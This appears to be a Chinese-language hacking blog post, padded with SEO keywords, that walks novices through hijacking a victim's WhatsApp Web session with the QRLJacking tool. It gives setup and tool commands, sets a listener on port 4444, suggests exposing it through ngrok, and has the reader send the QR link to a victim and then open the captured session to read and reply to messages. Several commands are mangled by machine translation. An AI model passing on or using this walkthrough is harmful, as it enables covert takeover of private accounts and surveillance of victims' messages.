我從新手黑客那裡收到的最常見的問題是“我如何在不接觸受害者設備的情況下破解 WhatsApp? ”今天,我將演示黑客如何僅通過使用社會工程技術,無需與設備進行物理交互或請求 OTP 即可訪問受害者的帳戶。
WhatsApp聊天記錄調查,whatsapp破解,駭客破解whatsapp密碼,
在深入探討這些資訊之前,我先澄清一點,幫助您理解我們的行動。 WhatsApp 採用端對端加密技術,幾乎不可能直接監視或閱讀受害者的 WhatsApp 訊息。在不同的條件和情況下,攻擊者會採用不同的攻擊方法,例如 MAC 位址欺騙、OTP 網路釣魚、SS7 攻擊等等。
QRLJacking
在本文中,我將向您展示一種稱為 QRLJacking 的方法。攻擊者會向目標裝置發送惡意鏈接,誘騙其掃描 WhatsApp 二維碼。這樣,攻擊者就可以捕捉 WhatsApp 網頁會話,WhatsApp聊天記錄調查從而讀取、監視或回覆訊息。
要求
- Linux/macOS(建議 Linux)
- Firefox最新版本
- Python 3.7+
我將在本文中展示一個 Linux 教學。
步驟
- 首先,您必須下載 Firefox 驅動程式並使用以下命令在您的 Linux 系統中進行設定:
tar -xvf <-類型-geckodriver-tar-包名稱->
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver
- 現在下載並設定 QRLJacking 工具給予的命令
git 克隆 https://github.com/OWASP/QRLJacking
cd QRLJacking/QRLJacker
pip 安裝 -r 要求.txt
python3 QrlJacker.py
現在 QRLJacker 介面在您的終端機上打開,WhatsApp聊天記錄調查如圖所示。
現在我們準備執行向量 QR Jacking 攻擊,輸入給定的指令:
使用抓取器/whatsapp
設定連接埠 4444
跑步
我正在本地主機上測試此工具。對於區域網路外的設備,您可以使用連接埠轉發,我建議使用 ngrok。在本教程中,我的連接埠是 4444,主機是 0.0.0.0。因此,我的二維碼連結是 0.0.0.0:4444。
現在,將該連結發送給受害者。一旦受害者掃描了 WhatsApp 網頁版二維碼,駭客或攻擊者就會獲得保存在此工具中的會話,從而允許他們稍後訪問 WhatsApp 網頁版會話。
- 按Ctrl +C攔截QRJacker工具,輸入以下指令:
會議
- 現在已儲存會話的清單顯示在您的終端機上(在我的情況下為“0”)
會話-i 0
現在等待幾秒鐘,Firefox 會自動啟動,您將獲得受害者的 WhatsApp 網路會話,WhatsApp聊天記錄調查如下圖所示。
我希望這些資訊對您有所幫助,請保存書籤以供將來的帖子使用,並加入我們的社區以獲取最新更新。
